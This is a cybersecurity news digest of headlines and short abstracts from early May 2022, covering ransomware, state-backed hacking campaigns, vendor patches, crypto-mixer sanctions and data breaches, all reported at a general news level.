OpenSea warns of Discord channel compromise Full Text
Abstract
OpenSea, the primary marketplace for buyers and sellers of non-fungible tokens (NFTs), has reported major problems with its Discord support channel owing to a "potential vulnerability" that allowed spambots to post phishing links to other users. – Malwarebytes Labs
May 7, 2022 – Cryptocurrency
US Treasury sanctions cryptocurrency mixer Blender Full Text
Abstract
As a result, among other limitations, anyone in the United States or a US person can no longer do any business with Blender without special permission from the government. – The Register
May 06, 2022 – Ransomware
The Week in Ransomware - May 6th 2022 - An evolving landscape Full Text
Abstract
Ransomware operations continue to evolve, with new groups appearing and others quietly shutting down their operations or rebranding as new groups. – BleepingComputer
May 06, 2022 – Government
U.S. Sanctions Cryptocurrency Mixer Blender for Helping North Korea Launder Millions Full Text
Abstract
The U.S. Treasury Department on Friday moved to sanction virtual currency mixer Blender.io, marking the first time a mixing service has been subjected to economic blockades. The move signals continued efforts on the part of the government to prevent North Korea's Lazarus Group from laundering the funds stolen from the unprecedented hack of Ronin Bridge in late March. The newly imposed sanctions, issued by the U.S. Office of Foreign Assets Control (OFAC), target 45 Bitcoin addresses linked to Blender.io and four new wallets linked to Lazarus Group, an advanced persistent threat with ties to the Democratic People's Republic of Korea (DPRK). "Blender was used in processing over $20.5 million of the illicit proceeds," the Treasury said, adding it was utilized by DPRK to "support its malicious cyber activities and money-laundering of stolen virtual currency." Cryptocurrency mixers, also called tumblers, are privacy-focused services that allow users to move cr – The Hacker News
May 6, 2022 – General
The Declaration for the Future of the Internet Is for Wavering Democracies, Not China and Russia Full Text
Abstract
The declaration means to persuade misbehaving democracies to stop internet transgressions. – Lawfare
May 6, 2022 – Attack
How the thriving fraud industry within Facebook attacks independent media Full Text
Abstract
Experts investigate how stolen Facebook accounts are used as part of a well-established fraud industry inside Facebook. No eyebrows were raised in Qurium's security operation center when the independent Philippine media outlet Bulatlat once again... – Security Affairs
May 06, 2022 – Breach
Ferrari subdomain hijacked to push fake Ferrari NFT collection Full Text
Abstract
One of Ferrari's subdomains was hijacked yesterday to host a scam promoting a fake Ferrari NFT collection, according to researchers. The Ethereum wallet associated with the cryptocurrency scam appears to have collected a few hundred dollars before the hacked subdomain was shut down. – BleepingComputer
May 06, 2022 – Malware
This New Fileless Malware Hides Shellcode in Windows Event Logs Full Text
Abstract
A new malicious campaign has been spotted taking advantage of Windows event logs to stash chunks of shellcode for the first time in the wild. "It allows the 'fileless' last stage trojan to be hidden from plain sight in the file system," Kaspersky researcher Denis Legezo said in a technical write-up published this week. The stealthy infection process, not attributed to a known actor, is believed to have commenced in September 2021 when the intended targets were lured into downloading compressed .RAR files containing Cobalt Strike and Silent Break. The adversary simulation software modules are then used as a launchpad to inject code into Windows system processes or trusted applications. Also notable is the use of anti-detection wrappers as part of the toolset, suggesting an attempt on the part of the operators to fly under the radar. One of the key methods is to keep encrypted shellcode containing the next-stage malware as 8KB pieces in event logs, a never-b – The Hacker News
May 6, 2022 – Vulnerabilities
QNAP fixes multiple flaws, including a QVR RCE vulnerability Full Text
Abstract
QNAP addressed multiple vulnerabilities, including a critical remote execution flaw affecting the QVR video surveillance solution. QNAP has addressed multiple vulnerabilities, including a critical security issue, tracked as CVE-2022-27588 (CVSS score... – Security Affairs
May 06, 2022 – Attack
US agricultural machinery maker AGCO hit by ransomware attack Full Text
Abstract
AGCO, a leading US-based agricultural machinery producer, has announced it was hit by a ransomware attack impacting some of its production facilities. – BleepingComputer
May 6, 2022 – Phishing
How Instagram scammers talk users out of their accounts Full Text
Abstract
Regardless of the script they're following, scammers will say you'll receive a link on your phone via SMS. They will then ask you not to click the link but merely take a screenshot and send the image back to them. – Malwarebytes Labs
May 06, 2022 – Vulnerabilities
QNAP Releases Firmware Patches for 9 New Flaws Affecting NAS Devices Full Text
Abstract
QNAP, Taiwanese maker of network-attached storage (NAS) devices, on Friday released security updates to patch nine security weaknesses, including a critical issue that could be exploited to take over an affected system. "A vulnerability has been reported to affect QNAP VS Series NVR running QVR," QNAP said in an advisory. "If exploited, this vulnerability allows remote attackers to run arbitrary commands." Tracked as CVE-2022-27588 (CVSS score: 9.8), the vulnerability has been addressed in QVR 5.1.6 build 20220401 and later. Credited with reporting the flaw is the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC). Aside from the critical shortcoming, QNAP has also resolved three high-severity and five medium-severity bugs in its software - CVE-2021-38693 (CVSS score: 5.3) - A path traversal vulnerability in thttpd affecting QNAP devices running QTS, QuTS hero, QuTScloud, and QVR Pro Appliance, leading to information disclosure C – The Hacker News
May 6, 2022 – Attack
Anonymous and Ukraine IT Army continue to target Russian entities Full Text
Abstract
The Anonymous collective and the volunteer group Ukraine IT Army continue to launch cyber attacks on Russian entities. The Anonymous collective continues its cyber war on Russian businesses and government organizations. Below is the list of the most... – Security Affairs
May 06, 2022 – Vulnerabilities
QNAP fixes critical QVR remote command execution vulnerability Full Text
Abstract
QNAP has released several security advisories today to alert its customers about various fixes for flaws affecting its products. The one that stands out is a critical RCE (remote code execution) in QVR. – BleepingComputer
May 6, 2022 – Malware
Steer clear of fake premium mobile app unlockers Full Text
Abstract
The site offers "tweaked apps", apparently available with a single click and requiring "no jailbreak, no root." There's an OnlyFans Premium, Netflix Premium, a Pokemon Go Spoofer Injector, and many more. – Malwarebytes Labs
May 06, 2022 – Malware
Researchers Warn of ‘Raspberry Robin’ Malware Spreading via External Drives Full Text
Abstract
Cybersecurity researchers have discovered a new Windows malware with worm-like capabilities that is propagated by means of removable USB devices. Attributing the malware to a cluster named "Raspberry Robin," Red Canary researchers noted that the worm "leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL." The earliest signs of the activity are said to date back to September 2021, with infections observed in organizations with ties to technology and manufacturing sectors. Attack chains pertaining to Raspberry Robin start with connecting an infected USB drive to a Windows machine. Present within the device is the worm payload, which appears as a .LNK shortcut file to a legitimate folder. The worm then takes care of spawning a new process using cmd.exe to read and execute a malicious file stored on the external drive. This is followed by launching explorer.exe and msiexec.exe, the latter of which is used for extern – The Hacker News
May 6, 2022 – Malware
NetDooka framework distributed via a pay-per-install (PPI) malware service Full Text
Abstract
Researchers discovered a sophisticated malware framework, dubbed NetDooka, distributed via a pay-per-install (PPI) malware service known as PrivateLoader. Trend Micro researchers uncovered a sophisticated malware framework dubbed NetDooka that is distributed... – Security Affairs
May 06, 2022 – Policy and Law
US sanctions Bitcoin laundering service used by North Korean hackers Full Text
Abstract
The US Department of Treasury today sanctioned cryptocurrency mixer Blender.io used last month by the North Korean-backed Lazarus hacking group to launder funds stolen from Axie Infinity's Ronin bridge. – BleepingComputer
May 6, 2022 – Attack
Russian Ransomware Group Claims Attack on Bulgarian Refugee Agency Full Text
Abstract
LockBit 2.0 posted a notice to the dark web portal it uses to identify and extort its victims saying it had files from the Bulgarian State Agency for Refugees under the Council of Ministers. – CyberScoop
May 06, 2022 – Hacker
Hackers Using PrivateLoader PPI Service to Distribute New NetDooka Malware Full Text
Abstract
A pay-per-install (PPI) malware service known as PrivateLoader has been spotted distributing a "fairly sophisticated" framework called NetDooka, granting attackers complete control over the infected devices. "The framework is distributed via a pay-per-install (PPI) service and contains multiple parts, including a loader, a dropper, a protection driver, and a full-featured remote access trojan (RAT) that implements its own network communication protocol," Trend Micro said in a report published Thursday. PrivateLoader, as documented by Intel 471 in February 2022, functions as a downloader responsible for downloading and installing additional malware onto the infected system, including SmokeLoader, RedLine Stealer, Vidar, Raccoon, GCleaner, and Anubis. Featuring anti-analysis techniques, PrivateLoader is written in the C++ programming language and is said to be in active development, with the downloader malware family gaining traction among multiple threat ac – The Hacker News
May 6, 2022 – Vulnerabilities
Vulnerable Docker Installations Are A Playhouse for Malware Attacks Full Text
Abstract
Uptycs researchers identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API. The Uptycs Threat Research team has identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API port...Security Affairs
May 6, 2022 – Cryptocurrency
Crypto Scammers exploit talk on Cryptocurrency Full Text
Abstract
The modified live streams make the original video smaller and put a frame around it advertising malicious sites that it claims will double the amount of cryptocurrency you send them.McAfee
May 06, 2022 – Attack
Experts Uncover New Espionage Attacks by Chinese ‘Mustang Panda’ Hackers Full Text
Abstract
The China-based threat actor known as Mustang Panda has been observed refining and retooling its tactics and malware to strike entities located in Asia, the European Union, Russia, and the U.S. "Mustang Panda is a highly motivated APT group relying primarily on the use of topical lures and social engineering to trick victims into infecting themselves," Cisco Talos said in a new report detailing the group's evolving modus operandi. The group is known to have targeted a wide range of organizations since at least 2012, with the actor primarily relying on email-based social engineering to gain initial access to drop PlugX, a backdoor predominantly deployed for long-term access. Phishing messages attributed to the campaign contain malicious lures masquerading as official European Union reports on the ongoing conflict in Ukraine or Ukrainian government reports, both of which download malware onto compromised machines. Also observed are phishing messages tailored to taThe Hacker News
May 6, 2022 – Attack
Ukraine IT Army hit EGAIS portal impacting Russia’s alcohol distribution Full Text
Abstract
Ukraine IT Army launched massive DDoS attacks on the EGAIS portal that has a crucial role in Russia's alcohol distribution. The collective of hacktivists Ukraine IT Army has launched a series of massive DDoS attacks on the Unified State Automated...Security Affairs
May 6, 2022 – Vulnerabilities
Android’s May 2022 Security Updates Patch 36 Vulnerabilities Full Text
Abstract
The most serious of these security holes, the internet giant notes in an advisory, is a high-severity issue in Android’s Framework component that could be exploited for privilege escalation.Security Week
May 05, 2022 – Vulnerabilities
Google Releases Android Update to Patch Actively Exploited Vulnerability Full Text
Abstract
Google has released monthly security patches for Android with fixes for 37 flaws across different components, one of which is a fix for an actively exploited Linux kernel vulnerability that came to light earlier this year. Tracked as CVE-2021-22600 (CVSS score: 7.8), the vulnerability is ranked "High" for severity and could be exploited by a local user to escalate privileges or deny service. The issue relates to a double-free vulnerability residing in the Packet network protocol implementation in the Linux kernel that could cause memory corruption, potentially leading to denial-of-service or execution of arbitrary code. Patches were released by different Linux distributions, including Debian , Red Hat , SUSE , and Ubuntu in January 2022. "There are indications that CVE-2021-22600 may be under limited, targeted exploitation," Google noted in its Android Security Bulletin for May 2022. Specifics about the nature of the attacks are unknown as yet.The Hacker News
May 05, 2022 – Malware
New Raspberry Robin worm uses Windows Installer to drop malware Full Text
Abstract
Red Canary intelligence analysts have discovered a new Windows malware with worm capabilities that spreads using external USB drives.BleepingComputer
May 5, 2022 – Business
Network Perception Secures $13 Million Series A Funding Round Full Text
Abstract
The funding round was led by The Westly Group, with participation from Energy Impact Partners and other existing investors, including Serra Ventures, Okapi Venture Capital, Energy Foundry, and SaaS Venture Capital.Yahoo Finance
May 05, 2022 – Government
NIST Releases Updated Cybersecurity Guidance for Managing Supply Chain Risks Full Text
Abstract
The National Institute of Standards and Technology (NIST) on Thursday released an updated cybersecurity guidance for managing risks in the supply chain, as it increasingly emerges as a lucrative attack vector. "It encourages organizations to consider the vulnerabilities not only of a finished product they are considering using, but also of its components — which may have been developed elsewhere — and the journey those components took to reach their destination," NIST said in a statement. The new directive outlines major security controls and practices that entities should adopt to identify, assess, and respond to risks at different stages of the supply chain, including the possibility of malicious functionality, flaws in third-party software, insertion of counterfeit hardware, and poor manufacturing and development practices. The development follows an Executive Order issued by the U.S. President on " Improving the Nation's Cybersecurity (14028) " lasThe Hacker News
May 5, 2022 – Vulnerabilities
Google addresses actively exploited Android flaw in the kernel Full Text
Abstract
Google released the May security bulletin for Android, 2022-05-05 security patch level, which fixed an actively exploited Linux kernel flaw. Google has released the second part of the May Security Bulletin for Android, which includes a fix for an actively...Security Affairs
May 5, 2022 – Education
Top Threats your Business Can Prevent on the DNS Level Full Text
Abstract
Web-filtering solutions, a must-have for businesses of any size, will protect your corporate network from multiple origins.Threatpost
May 05, 2022 – Encryption
White House: Prepare for cryptography-cracking quantum computers Full Text
Abstract
President Joe Biden signed a national security memorandum (NSM) on Thursday asking government agencies to implement a set of measures that would mitigate risks posed by quantum computers to US national cyber security.BleepingComputer
May 5, 2022 – Vulnerabilities
Serious Snipe-IT bug exploitable to send password reset email traps Full Text
Abstract
Developers have patched a critical vulnerability in Snipe-IT that could be exploited to send users malicious password reset requests. Grokability’s Snipe-IT is a cloud-based, open-source project for user asset management.The Daily Swig
May 05, 2022 – Solution
Google to Add Passwordless Authentication Support to Android and Chrome Full Text
Abstract
Google today announced plans to implement support for passwordless logins in Android and the Chrome web browser to allow users to seamlessly and securely sign in across different devices and websites irrespective of the platform. "This will simplify sign-ins across devices, websites, and applications no matter the platform — without the need for a single password," Google said . Apple and Microsoft are also expected to extend the support to iOS, macOS, and Windows operating systems as well as Safari and Edge browsers. The common Fast IDentity Online ( FIDO ) sign-in system does away with passwords entirely in favor of displaying a prompt asking a user to unlock the phone when signing into a website or an application. This is made possible by storing a cryptographically-secured FIDO credential called a passkey on the phone that's used to log in to the online account after unlocking the device. "Once you've done this, you won't need your phone again aThe Hacker News
May 5, 2022 – Vulnerabilities
Cisco addresses three bugs in Enterprise NFVIS Software Full Text
Abstract
Cisco addresses three flaws impacting its Enterprise NFV Infrastructure Software (NFVIS) that could allow the compromise of the hosts. Cisco addressed three vulnerabilities, tracked as CVE-2022-20777, CVE-2022-20779, and CVE-2022-20780, affecting...Security Affairs
May 05, 2022 – Government
Ukraine’s IT Army is disrupting Russia’s alcohol distribution Full Text
Abstract
Hacktivists operating on the side of Ukraine have focused their DDoS attacks on a portal that is considered crucial for the distribution of alcoholic beverages in Russia.BleepingComputer
May 5, 2022 – APT
Winnti APT Returns in New Operation CuckooBees Campaign Full Text
Abstract
The covert attack campaign was aimed at multiple technology and manufacturing organizations across North America, Western Europe, and East Asia, with an aim of stealing intellectual property.Cyware Alerts - Hacker News
May 05, 2022 – Education
The Importance of Defining Secure Code Full Text
Abstract
The developers who create the software, applications and programs that drive digital business have become the lifeblood of many organizations. Most modern businesses would not be able to (profitably) function, without competitive applications and programs, or without 24-hour access to their websites and other infrastructure. And yet, these very same touchpoints are also often the gateway that hackers and other nefarious users employ in order to steal information, launch attacks and springboard to other criminal activities such as fraud and ransomware. Successful attacks remain prevalent, even though spending on cybersecurity in most organizations is way up, and even though movements like DevSecOps are shifting security towards those developers who are the lifeblood of business today. Developers understand the importance of security, and overwhelmingly want to deploy secure and quality code, but software vulnerabilities continue to be exploited. Why? For the 2nd year, Secure CoThe Hacker News
May 5, 2022 – Vulnerabilities
A couple of 10-Year-Old flaws affect Avast and AVG antivirus Full Text
Abstract
A researcher discovered a couple of high-severity security flaws that affect a driver used by Avast and AVG antivirus solutions. SentinelOne researcher Kasif Dekel discovered two high-severity security vulnerabilities, tracked as CVE-2022-26522 and CVE-2022-26523,...Security Affairs
May 05, 2022 – Government
NIST updates guidance for defending against supply-chain attacks Full Text
Abstract
The National Institute of Standards and Technology (NIST) has released updated guidance on securing the supply chain against cyberattacks.BleepingComputer
May 5, 2022 – Business
GitHub launches new 2FA mandates for code developers, contributors Full Text
Abstract
On Wednesday, the Microsoft-owned code repository said that changes will be made to existing authentication rules as "part of a platform-wide effort to secure the software ecosystem through improving account security."ZDNet
May 05, 2022 – Vulnerabilities
Researchers Disclose Years-Old Vulnerabilities in Avast and AVG Antivirus Full Text
Abstract
Two high-severity security vulnerabilities, which went undetected for several years, have been discovered in a legitimate driver that's part of Avast and AVG antivirus solutions. "These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded," SentinelOne researcher Kasif Dekel said in a report shared with The Hacker News. Tracked as CVE-2022-26522 and CVE-2022-26523, the flaws reside in a legitimate anti-rootkit kernel driver named aswArPot.sys and are said to have been introduced in Avast version 12.1, which was released in June 2016. Specifically, the shortcomings are rooted in a socket connection handler in the kernel driver that could lead to privilege escalation by running code in the kernel from a non-administrator user, potentially causing the operating system to crash and display a blue screen of death ( BSoD ) eThe Hacker News
May 5, 2022 – Vulnerabilities
F5 warns its customers of tens of flaws in its products Full Text
Abstract
Cybersecurity provider F5 released security patches to address tens of vulnerabilities affecting its products. Security and application delivery solutions provider F5 released its security notification to inform customers that it has released security...Security Affairs
May 05, 2022 – Solution
Microsoft, Apple, and Google to support FIDO passwordless logins Full Text
Abstract
Microsoft, Apple, and Google announced today plans to support a common passwordless sign-in standard (known as passkeys) developed by the World Wide Web Consortium (W3C) and the FIDO Alliance.BleepingComputer
May 5, 2022 – General
7 threat detection challenges CISOs face and what they can do about it Full Text
Abstract
When piecing together an attack campaign, manual correlation and investigation of disparate security sources drastically extends the time and resources required from a CISO and his/her team.Help Net Security
May 05, 2022 – Breach
Heroku Forces User Password Resets Following GitHub OAuth Token Theft Full Text
Abstract
Salesforce-owned subsidiary Heroku on Thursday acknowledged that the theft of GitHub integration OAuth tokens further involved unauthorized access to an internal customer database. The company, in an updated notification , revealed that a compromised token was abused to breach the database and "exfiltrate the hashed and salted passwords for customers' user accounts." As a consequence, Salesforce said it's resetting all Heroku user passwords and ensuring that potentially affected credentials are refreshed. It also emphasized that internal Heroku credentials were rotated and extra detections have been put in place. The attack campaign, which GitHub discovered on April 12, related to an unidentified actor leveraging stolen OAuth user tokens issued to two third-party OAuth integrators, Heroku and Travis-CI, to download data from dozens of organizations, including NPM. The timeline of events as shared by the cloud platform is as follows - April 7, 2022 - ThreatThe Hacker News
May 05, 2022 – Vulnerabilities
Google fixes actively exploited Android kernel vulnerability Full Text
Abstract
Google has released the second part of the May security patch for Android, including a fix for an actively exploited Linux kernel vulnerability.BleepingComputer
May 5, 2022 – Vulnerabilities
Cisco Patches Critical VM Escape in NFV Infrastructure Software Full Text
Abstract
Cisco on Wednesday announced patches to address severe vulnerabilities in Enterprise Network Function Virtualization Infrastructure Software (NFVIS), including a critical bug that allows attackers to escape from a guest VM.Security Week
May 05, 2022 – Breach
Thousands of Borrowers’ Data Exposed from ENCollect Debt Collection Service Full Text
Abstract
An ElasticSearch server instance that was left open on the Internet without a password contained sensitive financial information about loans from Indian and African financial services. The leak, which was discovered by researchers from information security company UpGuard, amounted to 5.8GB and consisted of a total of 1,686,363 records. "Those records included personal information like name, loan amount, date of birth, account number, and more," UpGuard said in a report shared with The Hacker News. "A total of 48,043 unique email addresses were in the collection, some of which were for the product administrators, corporate clients, and collection agents assigned to each case." The exposed instance, used as data storage for a debt collection platform called ENCollect, was detected on February 16, 2022. The leaky server has since been rendered non-accessible to the public as of February 28 following intervention from the Indian Computer Emergency Response TeaThe Hacker News
May 05, 2022 – Malware
New NetDooka malware spreads via poisoned search results Full Text
Abstract
A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device.BleepingComputer
May 5, 2022 – Vulnerabilities
A couple of 10-Year-Old flaws affect Avast and AVG antivirus Full Text
Abstract
SentinelOne researcher Kasif Dekel discovered two high-severity security vulnerabilities, tracked as CVE-2022-26522 and CVE-2022-26523, that affect a driver used by Avast and AVG antivirus solutions.Security Affairs
May 05, 2022 – General
Tor project upgrades network speed performance with new system Full Text
Abstract
The Tor Project has published details about a newly introduced system called Congestion Control that promises to eliminate speed limits on the network.BleepingComputer
May 5, 2022 – Policy and Law
Federal Court of Australia finds RI Advice failed to manage cybersecurity risks in landmark decision Full Text
Abstract
The decision comes after a significant number of cyber incidents affected authorized representatives of RI Advice between June 2014 and May 2020, leading ASIC to file against the company for breach of its license obligations.ZDNet
May 05, 2022 – Breach
Heroku admits that customer credentials were stolen in cyberattack Full Text
Abstract
Heroku has now revealed that the stolen GitHub integration OAuth tokens from last month further led to the compromise of an internal customer database. The Salesforce-owned cloud platform acknowledged the same compromised token was used by attackers to exfiltrate customers' hashed and salted passwords from "a database."BleepingComputer
May 4, 2022 – Vulnerabilities
Unpatched DNS Bug Puts Millions of Routers, IoT Devices at Risk Full Text
Abstract
A flaw in all versions of the popular C standard libraries uClibc and uClibc-ng can allow for DNS poisoning attacks against target devices.Threatpost
May 04, 2022 – Vulnerabilities
Cisco Issues Patches for 3 New Flaws Affecting Enterprise NFVIS Software Full Text
Abstract
Cisco Systems on Wednesday shipped security patches to contain three flaws impacting its Enterprise NFV Infrastructure Software ( NFVIS ) that could permit an attacker to fully compromise and take control over the hosts. Tracked as CVE-2022-20777, CVE-2022-20779, and CVE-2022-20780, the vulnerabilities "could allow an attacker to escape from the guest virtual machine (VM) to the host machine, inject commands that execute at the root level, or leak system data from the host to the VM," the company said . Credited for discovering and reporting the issues are Cyrille Chatras, Pierre Denouel, and Loïc Restoux of Orange Group. Updates have been released in version 4.7.1. The networking equipment company said the flaws affect Cisco Enterprise NFVIS in the default configuration. Details of the three bugs are as follows - CVE-2022-20777 (CVSS score: 9.9) - An issue with insufficient guest restrictions that allows an authenticated, remote attacker to escape from the guest VMThe Hacker News
May 04, 2022 – Vulnerabilities
F5 Warns of a New Critical BIG-IP Remote Code Execution Vulnerability Full Text
Abstract
Cloud security and application delivery network ( ADN ) provider F5 on Wednesday released patches to contain 43 bugs spanning its products. Of the 43 issues addressed , one is rated Critical, 17 are rated High, 24 are rated Medium, and one is rated low in severity. Chief among the flaws is CVE-2022-1388 , which carries a CVSS score of 9.8 out of a maximum of 10 and stems from a lack of authentication check, potentially allowing an attacker to take control of an affected system. "This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services," F5 said in an advisory. "There is no data plane exposure; this is a control plane issue only." The security vulnerability, which the company said was discovered internally, affects BIG-IP products with the following versions - 16.1.0 - 16.1.2 15.1.0The Hacker News
May 04, 2022 – Vulnerabilities
F5 warns of critical BIG-IP RCE bug allowing device takeover Full Text
Abstract
F5 has issued a security advisory warning about a flaw that may allow unauthenticated attackers with network access to execute arbitrary system commands, perform file actions, and disable services on BIG-IP.BleepingComputer
May 4, 2022 – APT
APT29 Phishing Campaigns Target Government and Diplomats Full Text
Abstract
The phishing emails pretended to contain policy updates and originated from legitimate email addresses belonging to embassies. The campaign lasted from January to March 2022.Cyware Alerts - Hacker News
May 04, 2022 – Government
SEC Plans to Hire More Staff in Crypto Enforcement Unit to Fight Frauds Full Text
Abstract
The U.S. Securities and Exchange Commission (SEC) on Tuesday announced that it will expand and rebrand its Cyber Unit to fight against cyber-related threats and protect investors in cryptocurrency markets. To that end, the SEC is renaming the Cyber Unit within the Division of Enforcement to Crypto Assets and Cyber Unit and plans to infuse 20 additional positions with the goal of investigating wrongdoing in the crypto markets. The goal, per the agency, is to tackle cryptocurrency fraud and crackdown on malicious actors attempting to profit from crypto marketplaces. The Cyber Unit was instituted in September 2017 with a focus on addressing cyber-based threats and protecting retail investors. But given the dramatic evolution of the digital assets markets in recent years, the new unit is expected to focus on securities law violations pertaining to - Crypto asset offerings Crypto asset exchanges Crypto asset lending and staking products Decentralized finance (DeFi) platformsThe Hacker News
May 4, 2022 – APT
China-linked Winnti APT steals intellectual property from companies worldwide Full Text
Abstract
A sophisticated cyberespionage campaign, dubbed Operation CuckooBees, conducted by the China-linked Winnti group remained undetected since at least 2019. Researchers from Cybereason uncovered a sophisticated cyberespionage campaign, dubbed Operation...Security Affairs
May 4, 2022 – APT
China-linked APT Caught Pilfering Treasure Trove of IP Full Text
Abstract
A state-sponsored threat actor designed a house-of-cards style infection chain to exfiltrate massive troves of highly sensitive data.Threatpost
May 04, 2022 – Vulnerabilities
Cisco fixes NFVIS bugs that help gain root and hijack hosts Full Text
Abstract
Cisco has addressed several security flaws found in the Enterprise NFV Infrastructure Software (NFVIS), a solution that helps virtualize network services for easier management of virtual network functions (VNFs).BleepingComputer
May 4, 2022 – Hacker
Chinese Naikon Group Back with New Espionage Attack Full Text
Abstract
The spear-phishing email consists of a weaponized document pretending to be a call for tender. Two payloads are hidden in the document as document properties.Cyware Alerts - Hacker News
May 04, 2022 – Hacker
Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies Full Text
Abstract
An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019. Dubbed " Operation CuckooBees " by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information. Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America. "The attackers targeted intellectual property developed by the victims, including sensitive documents, blueprints, diagrams, formulas, and manufacturing-related proprietary data," the researchers said . "In addition, the attackers collected information that could be used for future cyberattacks, such as details about the target company's business units, network architecture, user accounts and credentials, employee emails, and customer data." Winnti, also tracked by otherThe Hacker News
May 4, 2022 – Denial Of Service
Pro-Ukraine attackers compromise Docker images to launch DDoS attacks on Russian sites Full Text
Abstract
Pro-Ukraine hackers are using Docker images to launch distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites. Pro-Ukraine hackers, likely linked to Ukraine IT Army, are using Docker images to launch...Security Affairs
May 4, 2022 – General
The Future of Executive Protection is Digital Full Text
Abstract
As threats to an executive’s safety and security increase, organizations should look to digital executive protection to help reduce risks manifesting in both the physical and digital worlds.Threatpost
May 04, 2022 – Malware
Pixiv, DeviantArt artists hit by NFT job offers pushing malware Full Text
Abstract
Users on Pixiv, DeviantArt, and other creator-oriented online platforms report receiving multiple messages from people claiming to be from the "Cyberpunk Ape Executives" NFT project, with the main goal to infect artists' devices with information-stealing malware.BleepingComputer
May 4, 2022 – APT
China-linked Curious Gorge APT Targeted Russian Government Agencies Full Text
Abstract
Google Threat Analysis Group (TAG) reported that an APT group linked to China’s People’s Liberation Army Strategic Support Force (PLA SSF), tracked as Curious Gorge, is targeting Russian government agencies.Security Affairs
May 04, 2022 – Vulnerabilities
Critical RCE Bug Reported in dotCMS Content Management Software Full Text
Abstract
A pre-authenticated remote code execution vulnerability has been disclosed in dotCMS, an open-source content management system written in Java and " used by over 10,000 clients in over 70 countries around the globe, from Fortune 500 brands and mid-sized businesses." The critical flaw, tracked as CVE-2022-26352 , stems from a directory traversal attack when performing file uploads, enabling an adversary to execute arbitrary commands on the underlying system. "An attacker can upload arbitrary files to the system," Shubham Shah of Assetnote said in a report. "By uploading a JSP file to the tomcat's root directory, it is possible to achieve code execution, leading to command execution." In other words, the arbitrary file upload flaw can be abused to replace already existing files in the system with a web shell, which can then be used to gain persistent remote access. Although the exploit made it possible to write to arbitrary JavaScript files beiThe Hacker News
May 4, 2022 – APT
Experts linked multiple ransomware strains to North Korea-backed APT38 group Full Text
Abstract
Researchers from Trellix linked multiple ransomware strains to the North Korea-backed APT38 group. The ransomware was employed in attacks on financial institutions; experts estimated that APT38 (Unit 180 of North Korea's cyber-army Bureau 121) has stolen...Security Affairs
May 04, 2022 – Attack
Attackers hijack UK NHS email accounts to steal Microsoft logins Full Text
Abstract
For about half a year, work email accounts belonging to over 100 employees of the National Health System (NHS) in the U.K. were used in several phishing campaigns, some aiming to steal Microsoft logins.BleepingComputer
May 4, 2022 – Attack
China-linked Winnti Hackers Perform Rare Windows Mechanism Abuse in Three-year-long Campaign Full Text
Abstract
According to researchers, the attacks have been focused on infiltrating the networks of technology and manufacturing companies in Europe, Asia, and North America, focusing on stealing sensitive proprietary information.ZDNet
May 04, 2022 – Hacker
Ukraine War Themed Files Become the Lure of Choice for a Wide Range of Hackers Full Text
Abstract
A growing number of threat actors are using the ongoing Russo-Ukrainian war as a lure in various phishing and malware campaigns, even as critical infrastructure entities continue to be heavily targeted. "Government-backed actors from China, Iran, North Korea and Russia, as well as various unattributed groups, have used various Ukraine war-related themes in an effort to get targets to open malicious emails or click malicious links," Google Threat Analysis Group's (TAG) Billy Leonard said in a report. "Financially motivated and criminal actors are also using current events as a means for targeting users," Leonard added. One notable threat actor is Curious Gorge, which TAG has attributed to China's People's Liberation Army Strategic Support Force (PLA SSF) and has been observed striking government, military, logistics and manufacturing organizations in Ukraine, Russia and Central Asia. Attacks aimed at Russia have singled out several governmental entitiThe Hacker News
May 4, 2022 – Ransomware
An expert shows how to stop popular ransomware samples via DLL hijacking Full Text
Abstract
A security researcher discovered that samples of Conti, REvil, and LockBit ransomware were vulnerable to DLL hijacking. The security researcher John Page (aka hyp3rlinx) discovered that malware from multiple ransomware operations, including Conti, REvil,...Security Affairs
May 04, 2022 – Attack
Heroku forces user password resets but fails to explain why Full Text
Abstract
Salesforce-owned Heroku is performing a forced password reset on a subset of user accounts in response to last month's security incident while providing no information as to why they are doing so other than vaguely mentioning it is to further secure accounts.BleepingComputer
May 4, 2022 – Government
SEC nearly doubles size of crypto and cyber enforcement unit Full Text
Abstract
The unit, formerly known as the cyber unit, will be renamed as the crypto assets and cyber unit and will continue to reside in the Division of Enforcement. It will also gain 20 additional team members, taking the unit's total headcount to 50.ZDNet
May 04, 2022 – Government
FBI says business email compromise is a $43 billion scam Full Text
Abstract
The Federal Bureau of Investigation (FBI) said today that the amount of money lost to business email compromise (BEC) scams continues to grow each year, with a 65% increase in the identified global exposed losses between July 2019 and December 2021.BleepingComputer
May 4, 2022 – Phishing
Watch Out! Verified Twitter Accounts Are Targeted in Phishing Attacks Full Text
Abstract
The targets were notified that there was a problem with their verified Twitter account and were advised to click on the ‘Check notifications’ button to find out more about what is wrong.Heimdal Security
May 04, 2022 – Criminals
Hackers stole data undetected from US, European orgs since 2019 Full Text
Abstract
Cybersecurity analysts have exposed a lengthy operation attributed to the group of Chinese hackers known as "Winnti" and tracked as APT41, which focused on stealing intellectual property assets like patents, copyrights, trademarks, and other types of valuable data.BleepingComputer
May 4, 2022 – Attack
Transport for NSW struck by cyberattack Full Text
Abstract
Transport for NSW has confirmed its Authorised Inspection Scheme (AIS) online application was impacted by a cyber incident in early April. The AIS authorizes examiners to inspect vehicles to ensure a minimum safety standard.ZDNet
May 04, 2022 – Business
GitHub to require 2FA from active developers by the end of 2023 Full Text
Abstract
GitHub announced today that all users who contribute code on its platform (an estimated 83 million developers in total) will be required to enable two-factor authentication (2FA) on their accounts by the end of 2023.BleepingComputer
May 4, 2022 – Business
Identity-Based Infrastructure Access Firm Teleport Raises $110 Million Full Text
Abstract
